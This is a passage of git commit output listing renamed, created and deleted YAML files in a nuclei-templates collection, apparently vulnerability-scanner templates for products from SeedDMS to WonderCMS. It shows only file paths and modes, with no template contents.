nuclei-templates/Other/security-txt.yaml create mode 100644 nuclei-templates/Other/security.txt.yaml rename nuclei-templates/Other/{securityspy-detect-10121.yaml => securityspy-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/seeddms-default-login-10125.yaml delete mode 100644 nuclei-templates/Other/seeddms-default-login.yaml rename nuclei-templates/Other/{seeddms-detect.yaml => seeddms-detect-10129.yaml} (100%) rename nuclei-templates/Other/{api-sendgrid.yaml => sendgrid.yaml} (100%) rename nuclei-templates/Other/{sensitive-storage-data-exposure.yaml => sensitive-storage-exposure.yaml} (100%) delete mode 100644 nuclei-templates/Other/seowon-router-rce-10148.yaml create mode 100644 nuclei-templates/Other/seowon-router-rce-10149.yaml create mode 100644 nuclei-templates/Other/sequoiadb-default-login-10150.yaml delete mode 100644 nuclei-templates/Other/sequoiadb-default-login-10152.yaml delete mode 100644 nuclei-templates/Other/server-backup-login-10156.yaml create mode 100644 nuclei-templates/Other/server-backup-login.yaml create mode 100644 nuclei-templates/Other/server-backup-manager-se-10160.yaml delete mode 100644 nuclei-templates/Other/server-backup-manager-se-login-detect.yaml rename nuclei-templates/Other/{service-pwd-10179.yaml => service-pwd.yaml} (100%) rename nuclei-templates/Other/{servicedesk-login-panel-10173.yaml => servicedesk-login-panel-10172.yaml} (100%) rename nuclei-templates/Other/{servicenow-helpdesk-credential.yaml => servicenow-helpdesk-credential-10175.yaml} (100%) rename nuclei-templates/Other/{setpreferences-xss(1).yaml => setpreferences-xss.yaml} (100%) delete mode 100644 nuclei-templates/Other/setup-page-exposure-10180.yaml create mode 100644 nuclei-templates/Other/setup-page-exposure-10181.yaml rename nuclei-templates/Other/{sgp-login-panel-10185.yaml => sgp-login-panel-10184.yaml} (100%) rename nuclei-templates/Other/{sharecenter-login-10189.yaml => sharecenter-login.yaml} (100%) rename nuclei-templates/Other/{shell_scripts.yaml => shellscripts-10194.yaml} (100%) rename nuclei-templates/Other/{Shipped100-sqli.yaml => shipped100-sqli.yaml} (100%) create mode 100644 nuclei-templates/Other/shiro-detect-10195.yaml delete mode 100644 nuclei-templates/Other/shiro-detect.yaml rename nuclei-templates/Other/{shopify-private-token-10199.yaml => shopify-private-token(1).yaml} (100%) delete mode 100644 nuclei-templates/Other/shopify-shared-secret(1).yaml create mode 100644 nuclei-templates/Other/shopify-shared-secret-10200.yaml delete mode 100644 nuclei-templates/Other/shopify-takeover-10202.yaml create mode 100644 nuclei-templates/Other/shopify-takeover.yaml delete mode 100644 nuclei-templates/Other/shopify-token-11863.yaml create mode 100644 nuclei-templates/Other/shopify-token.yaml rename nuclei-templates/Other/{shoppable-token.yaml => shoppable-token-10208.yaml} (100%) rename nuclei-templates/Other/{shopware-detect-10213.yaml => shopware-detect.yaml} (100%) rename nuclei-templates/Other/{shoutcast-server.yaml => shoutcast-server-10217.yaml} (100%) rename nuclei-templates/Other/{variable-dsl-function.yaml => show-version-warning.yaml} (100%) rename nuclei-templates/Other/{showdoc-default-login.yaml => showdoc-default-login-10222.yaml} (100%) delete mode 100644 nuclei-templates/Other/showdoc-file-upload-rce-10225.yaml create mode 100644 nuclei-templates/Other/showdoc-file-upload-rce.yaml rename nuclei-templates/Other/{sick-beard-xss-10230.yaml => sick-beard-xss-10233.yaml} (100%) delete mode 100644 nuclei-templates/Other/sidekiq-dashboard-10235.yaml create mode 100644 nuclei-templates/Other/sidekiq-dashboard-10239.yaml create mode 100644 nuclei-templates/Other/signatures-10251.yaml delete mode 100644 nuclei-templates/Other/signatures-10262.yaml delete mode 100644 nuclei-templates/Other/signatures-10266.yaml rename nuclei-templates/Other/{simple-crm-sql-injection-10278.yaml => simple-crm-sql-injection-10275.yaml} (100%) rename nuclei-templates/Other/{simplebooklet-takeover.yaml => simplebooklet-takeover-10274.yaml} (100%) create mode 100644 nuclei-templates/Other/sitecore-login-10289.yaml delete mode 100644 nuclei-templates/Other/sitecore-login.yaml rename nuclei-templates/Other/{sitecore-version.yaml => sitecore-version-10291.yaml} (100%) rename nuclei-templates/Other/{sitecore-workflow-10293.yaml => sitecore-workflow.yaml} (100%) rename nuclei-templates/Other/{SiteCore.yaml => sitecore.yaml} (100%) rename nuclei-templates/Other/{sitefinity-login-10298.yaml => sitefinity-login-10295.yaml} (100%) create mode 100644 nuclei-templates/Other/sitemap-detect.yaml delete mode 100644 nuclei-templates/Other/sitemap.yaml create mode 100644 nuclei-templates/Other/siteomat-login-10301.yaml delete mode 100644 nuclei-templates/Other/siteomat-login-10303.yaml delete mode 100644 nuclei-templates/Other/skycaiji-install-10307.yaml create mode 100644 nuclei-templates/Other/skycaiji-install.yaml create mode 100644 nuclei-templates/Other/slack-api(1).yaml delete mode 100644 nuclei-templates/Other/slack-api-11864.yaml rename nuclei-templates/Other/{slack-bot-token-10312.yaml => slack-bot-token-10310.yaml} (100%) rename nuclei-templates/Other/{Slack-webhook.yaml => slack-webhook-11865.yaml} (100%) create mode 100644 nuclei-templates/Other/slack.yaml delete mode 100644 nuclei-templates/Other/smartjob-takeover-10322.yaml create mode 100644 nuclei-templates/Other/smartjob-takeover-10323.yaml rename nuclei-templates/Other/{smartsense-default-login-10331.yaml => smartsense-default-login-10328.yaml} (100%) delete mode 100644 nuclei-templates/Other/smartstore-detect-10333.yaml create mode 100644 nuclei-templates/Other/smartstore-detect.yaml create mode 100644 nuclei-templates/Other/smb-v1-detection-10335.yaml delete mode 100644 nuclei-templates/Other/smb-v1-detection-10336.yaml rename nuclei-templates/Other/{snyk-ignore-file-disclosure-10348.yaml => snyk-ignore-file-disclosure-10347.yaml} (100%) rename nuclei-templates/Other/{sofneta-mecdream-pacs-lfi-10350.yaml => sofneta-mecdream-pacs-lfi.yaml} (100%) delete mode 100644 nuclei-templates/Other/solarwinds-default-login-10355.yaml create mode 100644 nuclei-templates/Other/solarwinds-default-login.yaml create mode 100644 nuclei-templates/Other/solarwinds-orion-10357.yaml delete mode 100644 nuclei-templates/Other/solarwinds-orion-10359.yaml delete mode 100644 nuclei-templates/Other/solr-exposure-10363.yaml create mode 100644 nuclei-templates/Other/solr-exposure.yaml delete mode 100644 nuclei-templates/Other/solr-query-dashboard-10367.yaml create mode 100644 nuclei-templates/Other/solr-query-dashboard-10369.yaml rename nuclei-templates/Other/{somfy-login-10373.yaml => somfy-login.yaml} (100%) create mode 100644 nuclei-templates/Other/sonarqube-login-10374.yaml delete mode 100644 nuclei-templates/Other/sonarqube-login.yaml rename nuclei-templates/Other/{sonarqube-public-projects.yaml => sonarqube-public-projects-10377.yaml} (100%) delete mode 100755 nuclei-templates/Other/sonarqube-token-10380.yaml create mode 100644 nuclei-templates/Other/sonarqube-token.yaml create mode 100644 nuclei-templates/Other/sonicwall-management-panel-10385.yaml delete mode 100644 nuclei-templates/Other/sonicwall-management-panel.yaml delete mode 100644 nuclei-templates/Other/sonicwall-sslvpn-shellshock-10395.yaml create mode 100644 nuclei-templates/Other/sonicwall-sslvpn-shellshock.yaml rename nuclei-templates/Other/{spark-webui-unauth.yaml => spark-webui-unauth-10401.yaml} (100%) rename nuclei-templates/Other/{spectracom-default-login-10405.yaml => spectracom-default-login-10403.yaml} (100%) rename nuclei-templates/Other/{sphider-login-10409.yaml => sphider-login-10408.yaml} (100%) create mode 100644 nuclei-templates/Other/splunk-login-10418.yaml delete mode 100644 nuclei-templates/Other/splunk-login-10420.yaml rename nuclei-templates/Other/{spon-ip-rce(1).yaml => spon-ip-rce.yaml} (100%) rename nuclei-templates/Other/{SPON-IP-SSRF.yaml => spon-ip-ssrf.yaml} (100%) delete mode 100644 nuclei-templates/Other/sponip-network-system-ping-rce-10421.yaml create mode 100644 nuclei-templates/Other/sponip-network-system-ping-rce-10422.yaml create mode 100644 nuclei-templates/Other/spoofable-spf-records-ptr-10426.yaml delete mode 100644 nuclei-templates/Other/spoofable-spf-records-ptr.yaml rename nuclei-templates/Other/{spring-framework-exceptions.yaml => spring-framework-exceptions-10493.yaml} (100%) rename nuclei-templates/Other/{springboot-actuators-jolokia-xxe-10430.yaml => springboot-actuators-jolokia-xxe-10429.yaml} (100%) rename nuclei-templates/Other/{springboot-beans-10438.yaml => springboot-beans-10440.yaml} (100%) create mode 100644 nuclei-templates/Other/springboot-configprops-10443.yaml delete mode 100644 nuclei-templates/Other/springboot-configprops-10445.yaml rename nuclei-templates/Other/{spring-boot-actuators.yaml => springboot-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/springboot-dump-10446.yaml delete mode 100644 nuclei-templates/Other/springboot-dump-10447.yaml rename nuclei-templates/Other/{springboot-env-10449.yaml => springboot-env-10448.yaml} (100%) rename nuclei-templates/Other/{springboot-gateway.yaml => springboot-gateway-10452.yaml} (100%) create mode 100644 nuclei-templates/Other/springboot-h2-db-rce-10455.yaml delete mode 100644 nuclei-templates/Other/springboot-h2-db-rce.yaml delete mode 100644 nuclei-templates/Other/springboot-health-10459.yaml create mode 100644 nuclei-templates/Other/springboot-health.yaml delete mode 100644 nuclei-templates/Other/springboot-heapdump-10465.yaml create mode 100644 nuclei-templates/Other/springboot-heapdump.yaml create mode 100644 nuclei-templates/Other/springboot-httptrace-10467.yaml delete mode 100644 nuclei-templates/Other/springboot-httptrace-10469.yaml rename nuclei-templates/Other/{springboot-info-10471.yaml => springboot-info-10470.yaml} (100%) rename nuclei-templates/Other/{springboot-log4j-rce.yaml => springboot-log4j-rce-10473.yaml} (100%) rename nuclei-templates/Other/{springboot-mappings-10481.yaml => springboot-mappings-10479.yaml} (100%) create mode 100644 nuclei-templates/Other/springboot-metrics-10482.yaml delete mode 100644 nuclei-templates/Other/springboot-metrics-10483.yaml rename nuclei-templates/Other/{springboot-threaddump-10487.yaml => springboot-threaddump-10486.yaml} (100%) rename nuclei-templates/Other/{springboot-trace-10492.yaml => springboot-trace-10490.yaml} (100%) delete mode 100644 nuclei-templates/Other/sprintful-takeover-10494.yaml create mode 100644 nuclei-templates/Other/sprintful-takeover-10495.yaml delete mode 100644 nuclei-templates/Other/sql-dump-10497.yaml create mode 100644 nuclei-templates/Other/sql-dump-10498.yaml rename nuclei-templates/Other/{pikpikcusqli.yaml => sql-injection.yaml} (100%) delete mode 100644 nuclei-templates/Other/sql-server-reporting-10508.yaml create mode 100644 nuclei-templates/Other/sql-server-reporting.yaml delete mode 100644 nuclei-templates/Other/sqli-error-based.yaml create mode 100644 nuclei-templates/Other/sqli2.yaml delete mode 100644 nuclei-templates/Other/sqli_header (copy 1).yaml rename nuclei-templates/Other/{square-access-token.yaml => square-access-token-11867.yaml} (100%) delete mode 100644 nuclei-templates/Other/square-oauth-secret(1).yaml create mode 100644 nuclei-templates/Other/square-oauth-secret-11868.yaml delete mode 100644 nuclei-templates/Other/squid-analysis-report-generator-10512.yaml create mode 100644 nuclei-templates/Other/squid-analysis-report-generator-10514.yaml rename nuclei-templates/Other/{squirrelmail-add-xss-10515.yaml => squirrelmail-add-xss.yaml} (100%) rename nuclei-templates/Other/{squirrelmail-lfi-10518.yaml => squirrelmail-lfi-10517.yaml} (100%) create mode 100644 nuclei-templates/Other/sse-cmk-disabled.yaml create mode 100644 nuclei-templates/Other/sse-smk-disabled.yaml rename nuclei-templates/Other/{ssh-known-hosts-10524.yaml => ssh-known-hosts.yaml} (100%) delete mode 100644 nuclei-templates/Other/ssrf-detection.yaml create mode 100644 nuclei-templates/Other/ssrf_nagli.yaml rename nuclei-templates/Other/{ssti.yaml => ssti-jinja2.yaml} (100%) rename nuclei-templates/Other/{stackstorm-default-login-10530.yaml => stackstorm-default-login.yaml} (100%) create mode 100644 nuclei-templates/Other/strapi-cms-detect-10538.yaml delete mode 100644 nuclei-templates/Other/strapi-cms-detect.yaml create mode 100644 nuclei-templates/Other/strapi-documentation-10543.yaml delete mode 100644 nuclei-templates/Other/strapi-documentation.yaml create mode 100644 nuclei-templates/Other/strapi-page-10545.yaml delete mode 100644 nuclei-templates/Other/strapi-page.yaml create mode 100644 nuclei-templates/Other/strikingly-takeover-10550.yaml delete mode 100644 nuclei-templates/Other/strikingly-takeover-10552.yaml delete mode 100644 nuclei-templates/Other/stripe-api-key(1).yaml create mode 100644 nuclei-templates/Other/stripe-api-key.yaml delete mode 100644 nuclei-templates/Other/stripe-secret-key-10558.yaml create mode 100755 nuclei-templates/Other/stripe-secret-key.yaml delete mode 100644 nuclei-templates/Other/strut-debug-mode.yaml create mode 100644 nuclei-templates/Other/struts-debug-mode-10560.yaml create mode 100644 nuclei-templates/Other/subdomain-takeover.yaml rename nuclei-templates/Other/{submitty-login.yaml => submitty-login-10567.yaml} (100%) rename nuclei-templates/Other/{sugarcrm-panel-10569.yaml => sugarcrm-panel-10571.yaml} (100%) rename nuclei-templates/Other/{superset-default-login.yaml => superset-default-login-10573.yaml} (100%) delete mode 100644 nuclei-templates/Other/supervpn-panel-10577.yaml create mode 100644 nuclei-templates/Other/supervpn-panel.yaml create mode 100644 nuclei-templates/Other/surge-takeover-10578.yaml rename nuclei-templates/Other/{surveygizmo-takeover.yaml => surveygizmo-takeover-10583.yaml} (100%) delete mode 100644 nuclei-templates/Other/swagger-ui-bypass.yaml delete mode 100644 nuclei-templates/Other/swagger-ui.yaml create mode 100644 nuclei-templates/Other/symantec-dlp-login-10596.yaml delete mode 100644 nuclei-templates/Other/symantec-dlp-login-10598.yaml create mode 100644 nuclei-templates/Other/symantec-epm-login-10599.yaml delete mode 100644 nuclei-templates/Other/symantec-epm-login-10602.yaml create mode 100644 nuclei-templates/Other/symantec-messaging-gateway-10607.yaml delete mode 100644 nuclei-templates/Other/symantec-messaging-gateway.yaml create mode 100644 nuclei-templates/Other/symfonyrce(1).yaml create mode 100644 nuclei-templates/Other/synology-web-station-10632.yaml delete mode 100644 nuclei-templates/Other/synology-web-station.yaml rename nuclei-templates/Other/{szhe-default-login-10638.yaml => szhe-default-login-10635.yaml} (100%) create mode 100644 nuclei-templates/Other/tableau-panel-10641.yaml delete mode 100644 nuclei-templates/Other/tableau-panel.yaml rename nuclei-templates/Other/{tabnabbing-check-10644.yaml => tabnabbing-check-10646.yaml} (100%) rename nuclei-templates/Other/{tamronos-rce-10647.yaml => tamronos-rce.yaml} (100%) rename nuclei-templates/Other/{targa-camera-lfi-10655.yaml => targa-camera-lfi-10654.yaml} (100%) create mode 100644 nuclei-templates/Other/tave-takeover-10659.yaml delete mode 100644 nuclei-templates/Other/tave-takeover.yaml delete mode 100644 nuclei-templates/Other/tcpconfig-10663.yaml create mode 100644 nuclei-templates/Other/tcpconfig-10666.yaml delete mode 100644 nuclei-templates/Other/teamcity-registration-enabled-10667.yaml create mode 100644 nuclei-templates/Other/teamcity-registration-enabled.yaml rename nuclei-templates/Other/{4147374715.yaml => teamviewer.yaml} (100%) create mode 100644 nuclei-templates/Other/teamwork-takeover-10668.yaml delete mode 100644 nuclei-templates/Other/teamwork-takeover-10671.yaml delete mode 100644 nuclei-templates/Other/tech-detect-10674.yaml create mode 100644 nuclei-templates/Other/tech-detect-10677.yaml create mode 100644 nuclei-templates/Other/tectuus-scada-monitor-10679.yaml delete mode 100644 nuclei-templates/Other/tectuus-scada-monitor.yaml rename nuclei-templates/Other/{tekon-info-leak.yaml => tekon-info-leak-10684.yaml} (100%) create mode 100644 nuclei-templates/Other/telecom-gateway-default-login-10686.yaml delete mode 100644 nuclei-templates/Other/telecom-gateway-default-login.yaml delete mode 100644 nuclei-templates/Other/telerik-dialoghandler-detect-10690.yaml create mode 100644 nuclei-templates/Other/telerik-dialoghandler-detect.yaml delete mode 100644 nuclei-templates/Other/teradici-pcoip-10702.yaml create mode 100644 nuclei-templates/Other/teradici-pcoip-10704.yaml rename nuclei-templates/Other/{terraform-detect.yaml => terraform-detect-10707.yaml} (100%) delete mode 100644 nuclei-templates/Other/terraform-enterprise-panel-10711.yaml create mode 100644 nuclei-templates/Other/terraform-enterprise-panel.yaml rename nuclei-templates/Other/{43 - T8.yaml => tg8preauthrce-220331-222435.yaml} (100%) create mode 100644 nuclei-templates/Other/thinkCMF_include.yaml rename nuclei-templates/Other/{thinkcmf-arbitrary-code-execution.yaml => thinkcmf-arbitrary-code-execution-10715.yaml} (100%) create mode 100644 nuclei-templates/Other/thinkcmf-lfi-10722.yaml create mode 100644 nuclei-templates/Other/thinkcmf-rce-10729.yaml delete mode 100644 nuclei-templates/Other/thinkcmf-rce.yaml delete mode 100644 nuclei-templates/Other/thinkcmf_include.yaml delete mode 100644 nuclei-templates/Other/thinkphp-5023-rce-10749.yaml create mode 100644 nuclei-templates/Other/thinkphp-5023-rce-10751.yaml delete mode 100644 nuclei-templates/Other/threatq-login-10756.yaml create mode 100644 nuclei-templates/Other/threatq-login-10757.yaml create mode 100644 nuclei-templates/Other/tianqing-info-leak-10765.yaml delete mode 100644 nuclei-templates/Other/tianqing-info-leak.yaml rename nuclei-templates/Other/{tictail-takeover-10767.yaml => tictail-takeover-10768.yaml} (100%) delete mode 100644 nuclei-templates/Other/tidb-unauth-10772.yaml create mode 100644 nuclei-templates/Other/tidb-unauth.yaml create mode 100644 nuclei-templates/Other/tiki.yaml rename nuclei-templates/Other/{tikiwiki-cms-10776.yaml => tikiwiki-cms-10775.yaml} (100%) create mode 100644 nuclei-templates/Other/tikiwiki-reflected-xss-10778.yaml delete mode 100644 nuclei-templates/Other/tikiwiki-reflected-xss.yaml create mode 100644 nuclei-templates/Other/tileserver-gl-10787.yaml delete mode 100644 nuclei-templates/Other/tileserver-gl.yaml create mode 100644 nuclei-templates/Other/time-based-sqli.yaml delete mode 100644 nuclei-templates/Other/time-sql-test.yaml create mode 100644 nuclei-templates/Other/time-sqlinjection-uri-finder.yaml create mode 100644 nuclei-templates/Other/time_sql_peremeter.yaml create mode 100644 nuclei-templates/Other/tinypng.yaml delete mode 100644 nuclei-templates/Other/titannit-web-rce.yaml create mode 100644 nuclei-templates/Other/titannit-web-ssrf.yaml rename nuclei-templates/Other/{tomcat-detect-10793.yaml => tomcat-detect-10794.yaml} (100%) create mode 100644 nuclei-templates/Other/tomcat-examples-login.yaml delete mode 100644 nuclei-templates/Other/tomcat-examples-login_CVE-2022-34305.yaml rename nuclei-templates/Other/{tomcat-manager-pathnormalization-10796.yaml => tomcat-manager-pathnormalization.yaml} (100%) delete mode 100644 nuclei-templates/Other/tomcat-scripts-10803.yaml create mode 100644 nuclei-templates/Other/tomcat-scripts.yaml delete mode 100644 nuclei-templates/Other/top-xss-params-10806.yaml create mode 100644 nuclei-templates/Other/top-xss-params-10807.yaml rename nuclei-templates/Other/{totemomail-detect-10819.yaml => totemomail-detect.yaml} (100%) rename nuclei-templates/Other/{tpshop-directory-traversal-10823.yaml => tpshop-directory-traversal.yaml} (100%) delete mode 100644 nuclei-templates/Other/trace-axd-detect-10825.yaml create mode 100644 nuclei-templates/Other/trace-axd-detect-10826.yaml delete mode 100644 nuclei-templates/Other/trace-method-10827.yaml create mode 100644 nuclei-templates/Other/trace-method.yaml delete mode 100644 nuclei-templates/Other/traefik-dashboard-10832.yaml create mode 100644 nuclei-templates/Other/traefik-dashboard.yaml rename nuclei-templates/Other/{trilithic-viewpoint-default-10835.yaml => trilithic-viewpoint-login-10839.yaml} (100%) delete mode 100644 nuclei-templates/Other/tugboat-config-exposure-10843.yaml create mode 100644 nuclei-templates/Other/tugboat-config-exposure.yaml delete mode 100644 nuclei-templates/Other/tuxedo-connected-controller-10852.yaml create mode 100644 nuclei-templates/Other/tuxedo-connected-controller-10853.yaml delete mode 100644 nuclei-templates/Other/twig-php-ssti-10856.yaml create mode 100644 nuclei-templates/Other/twig-php-ssti-10858.yaml create mode 100644 nuclei-templates/Other/twitter-secret(1).yaml delete mode 100644 nuclei-templates/Other/twitter-secret.yaml delete mode 100644 nuclei-templates/Other/txt-fingerprint-10863.yaml create mode 100644 nuclei-templates/Other/txt-fingerprint.yaml rename nuclei-templates/Other/{uberflip-takeover-10866.yaml => uberflip-takeover-10864.yaml} (100%) delete mode 100644 nuclei-templates/Other/ueditor-file-upload-10872.yaml create mode 100644 nuclei-templates/Other/ueditor-file-upload-10876.yaml delete mode 100644 nuclei-templates/Other/ultimatemember-open-redirect.yaml rename nuclei-templates/Other/{umbraco-base-ssrf-10882.yaml => umbraco-base-ssrf.yaml} (100%) delete mode 100644 nuclei-templates/Other/umbraco.yaml rename nuclei-templates/Other/{unauth-ftp.yaml => unauth-ftp-10939.yaml} (100%) rename nuclei-templates/Other/{unauth-hoteldruid-panel.yaml => unauth-hoteldruid-panel-10943.yaml} (100%) delete mode 100644 nuclei-templates/Other/unauth-message-read-10945.yaml create mode 100644 nuclei-templates/Other/unauth-message-read.yaml delete mode 100644 nuclei-templates/Other/unauth-rlm-10960.yaml rename nuclei-templates/Other/{unauth-spark-api.yaml => unauth-spark-api-10965.yaml} (100%) delete mode 100644 nuclei-templates/Other/unauth-wavink-panel-10966.yaml create mode 100644 nuclei-templates/Other/unauth-wavink-panel.yaml rename nuclei-templates/Other/{unauth-xproxy-dashboard.yaml => unauth-xproxy-dashboard-10968.yaml} (100%) rename nuclei-templates/Other/{unauthenticated-airflow-10884.yaml => unauthenticated-airflow-10886.yaml} (100%) rename nuclei-templates/Other/{unauthenticated-alert-manager-10890.yaml => unauthenticated-alert-manager-10888.yaml} (100%) create mode 100644 nuclei-templates/Other/unauthenticated-glowroot-10902.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-glowroot.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-influxdb-10903.yaml create mode 100644 nuclei-templates/Other/unauthenticated-influxdb.yaml rename nuclei-templates/Other/{unaunthenticated-jenkin.yaml => unauthenticated-jenkin-dashboard.yaml} (100%) delete mode 100644 nuclei-templates/Other/unauthenticated-jenkins.yaml create mode 100644 nuclei-templates/Other/unauthenticated-mongo-express-10909.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-mongo-express.yaml create mode 100644 nuclei-templates/Other/unauthenticated-nacos-access-10915.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-nacos-access.yaml create mode 100644 nuclei-templates/Other/unauthenticated-netdata-10918.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-netdata.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-prtg-10924.yaml create mode 100644 nuclei-templates/Other/unauthenticated-prtg.yaml rename nuclei-templates/Other/{unauthenticated-tensorboard.yaml => unauthenticated-tensorboard-10930.yaml} (100%) rename nuclei-templates/Other/{unauthenticated-varnish-cache-purge-10933.yaml => unauthenticated-varnish-cache-purge-10931.yaml} (100%) rename nuclei-templates/Other/{unauthenticated-zippkin.yaml => unauthenticated-zippkin-10937.yaml} (100%) create mode 100644 nuclei-templates/Other/unauthorized-hp-officepro-printer-10950.yaml delete mode 100644 nuclei-templates/Other/unauthorized-hp-officepro-printer.yaml rename nuclei-templates/Other/{unauthorized-plastic-scm-10955.yaml => unauthorized-plastic-scm.yaml} (100%) delete mode 100644 nuclei-templates/Other/unauthorized-puppet-node-manager-detect-10958.yaml create mode 100644 nuclei-templates/Other/unauthorized-puppet-node-manager-detect.yaml delete mode 100644 nuclei-templates/Other/unbounce-takeover-10971.yaml create mode 100644 nuclei-templates/Other/unbounce-takeover.yaml rename nuclei-templates/Other/{miscellaneous_unencrypted-bigip-ltm-cookie.yaml => unencrypted-bigip-ltm-cookie-10973.yaml} (100%) delete mode 100644 nuclei-templates/Other/unifi-network-log4j-rce-10974.yaml create mode 100644 nuclei-templates/Other/unifi-network-log4j-rce-10975.yaml delete mode 100644 nuclei-templates/Other/ups-status-10985.yaml create mode 100644 nuclei-templates/Other/ups-status.yaml delete mode 100644 nuclei-templates/Other/uptimerobot-takeover-10987.yaml create mode 100644 nuclei-templates/Other/uptimerobot-takeover-10988.yaml delete mode 100644 nuclei-templates/Other/urge-takeover-10990.yaml create mode 100644 nuclei-templates/Other/vanguard-post-xss-10992.yaml delete mode 100644 nuclei-templates/Other/vanguard-post-xss-10994.yaml rename nuclei-templates/Other/{vend-takeover-10996.yaml => vend-takeover-10998.yaml} (100%) rename nuclei-templates/Other/{vercel-takeover-11000.yaml => vercel-takeover-11001.yaml} (100%) delete mode 100644 nuclei-templates/Other/viewlinc-crlf-injection-11011.yaml create mode 100644 nuclei-templates/Other/viewlinc-crlf-injection-11014.yaml rename nuclei-templates/Other/{viewpoint-system-status-11018.yaml => viewpoint-system-status-11019.yaml} (100%) delete mode 100644 nuclei-templates/Other/vigor-login-11021.yaml create mode 100644 nuclei-templates/Other/vigor-login.yaml create mode 100644 nuclei-templates/Other/virtual-ema-detect-11025.yaml delete mode 100644 nuclei-templates/Other/virtual-ema-detect.yaml rename nuclei-templates/Other/{visionhub-default-login-11027.yaml => visionhub-default-login-11026.yaml} (100%) create mode 100644 nuclei-templates/Other/visual-tools-dvr-rce-11030.yaml delete mode 100644 nuclei-templates/Other/visual-tools-dvr-rce.yaml create mode 100644 nuclei-templates/Other/vmware-horizon-11040.yaml rename nuclei-templates/Other/{vmware-horizon-panel.yaml => vmware-horizon-panel-11036.yaml} (100%) delete mode 100644 nuclei-templates/Other/vmware-vcenter-lfi-11047.yaml create mode 100644 nuclei-templates/Other/vmware-vcenter-lfi-11048.yaml create mode 100644 nuclei-templates/Other/vmware-vcenter-lfi-linux-11044.yaml delete mode 100644 nuclei-templates/Other/vmware-vcenter-lfi-linux-11045.yaml delete mode 100644 nuclei-templates/Other/vmware-vcenter-log4j-jndi-rce-11049.yaml create mode 100644 nuclei-templates/Other/vmware-vcenter-log4j-jndi-rce.yaml rename nuclei-templates/Other/{vmware-version-detect-11054.yaml => vmware-version-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/vmware-workflow-11059.yaml delete mode 100644 nuclei-templates/Other/vmware-workflow.yaml create mode 100644 nuclei-templates/Other/vnc-detect-11061.yaml delete mode 100644 nuclei-templates/Other/vnc-detect.yaml rename nuclei-templates/Other/{voipmonitor-detect.yaml => voipmonitor-detect-11063.yaml} (100%) create mode 100644 nuclei-templates/Other/voipmonitor-rce.yaml rename nuclei-templates/Other/{voipmonitor-workflow-11064.yaml => voipmonitor-workflow.yaml} (100%) delete mode 100644 nuclei-templates/Other/voipmonitorrce-220331-222339.yaml create mode 100644 nuclei-templates/Other/vpms-auth-bypass-11066.yaml delete mode 100644 nuclei-templates/Other/vpms-auth-bypass-11069.yaml rename nuclei-templates/Other/{vrealize-operations-log4j-rce-11071.yaml => vrealize-operations-log4j-rce.yaml} (100%) rename nuclei-templates/Other/{vsftpd-detection-11073.yaml => vsftpd-detection-11076.yaml} (100%) delete mode 100644 nuclei-templates/Other/wadl-api-11084.yaml create mode 100644 nuclei-templates/Other/wadl-api-11085.yaml rename nuclei-templates/Other/{waf-detect-11089.yaml => waf-detect-11087.yaml} (100%) create mode 100644 nuclei-templates/Other/wamp-xdebug-detect-11100.yaml delete mode 100644 nuclei-templates/Other/wamp-xdebug-detect-11104.yaml rename nuclei-templates/Other/{wangkang-ns-asg-rce-1.yaml => wangkang-NS-ASG-rce-1.yaml} (100%) create mode 100644 nuclei-templates/Other/wazuh-detect-11110.yaml delete mode 100644 nuclei-templates/Other/wazuh-detect-11111.yaml rename nuclei-templates/Other/{wazuh-panel-11113.yaml => wazuh-panel.yaml} (100%) delete mode 100644 nuclei-templates/Other/weave-scope-dashboard-detect-11118.yaml create mode 100644 nuclei-templates/Other/weave-scope-dashboard-detect-11120.yaml rename nuclei-templates/Other/{web-local-craft-11141.yaml => web-local-craft.yaml} (100%) rename nuclei-templates/Other/{dom-xss-web-message.yaml => web-message.yaml} (100%) create mode 100644 nuclei-templates/Other/webeditors-11129.yaml delete mode 100644 nuclei-templates/Other/webeditors.yaml rename nuclei-templates/Other/{webflow-takeover-11131.yaml => webflow-takeover-11133.yaml} (100%) rename nuclei-templates/Other/{weblogic-detect-11144.yaml => weblogic-detect-11142.yaml} (100%) create mode 100644 nuclei-templates/Other/weblogic-iiop-detect-11147.yaml delete mode 100644 nuclei-templates/Other/weblogic-iiop-detect.yaml delete mode 100644 nuclei-templates/Other/weblogic-login-11149.yaml create mode 100644 nuclei-templates/Other/weblogic-login.yaml create mode 100644 nuclei-templates/Other/weblogic-t3-detect-11152.yaml delete mode 100644 nuclei-templates/Other/weblogic-t3-detect.yaml create mode 100644 nuclei-templates/Other/webmodule-ee-11162.yaml rename nuclei-templates/Other/{webmodule-ee-panel.yaml => webmodule-ee-panel-11161.yaml} (100%) delete mode 100644 nuclei-templates/Other/webmodule-ee.yaml rename nuclei-templates/Other/{Webtalk-leakage.yaml => webtalk-leakage.yaml} (100%) rename nuclei-templates/Other/{webtools-home.yaml => webtools-home-11169.yaml} (100%) create mode 100644 nuclei-templates/Other/webui-rce-11172.yaml delete mode 100644 nuclei-templates/Other/webui-rce.yaml rename nuclei-templates/Other/{webview-addjavascript-interface-11175.yaml => webview-addjavascript-interface.yaml} (100%) delete mode 100644 nuclei-templates/Other/webview-load-url-11180.yaml create mode 100644 nuclei-templates/Other/webview-load-url.yaml rename nuclei-templates/Other/{webview-universal-access-11185.yaml => webview-universal-access-11184.yaml} (100%) rename nuclei-templates/Other/{werkzeug-debugger-detect.yaml => werkzeug-debugger-detect-11198.yaml} (100%) rename nuclei-templates/Other/{wildfly-panel-11211.yaml => wildfly-panel.yaml} (100%) rename nuclei-templates/Other/{window-name-domxss-11212.yaml => window-name-domxss.yaml} (100%) create mode 100644 nuclei-templates/Other/wireless-leakage(1).yaml create mode 100644 nuclei-templates/Other/wondercms-detect-11223.yaml delete mode 100644 nuclei-templates/Other/wondercms-detect.yaml delete mode 100644 nuclei-templates/Other/wooyun-2015-148227(1).yaml create mode 100644 nuclei-templates/Other/wooyun-2015-148227-11225.yaml create mode 100644 nuclei-templates/Other/wooyun-2015-148227-11227.yaml delete mode 100644 nuclei-templates/Other/wooyun-2015-148227.yaml delete mode 100644 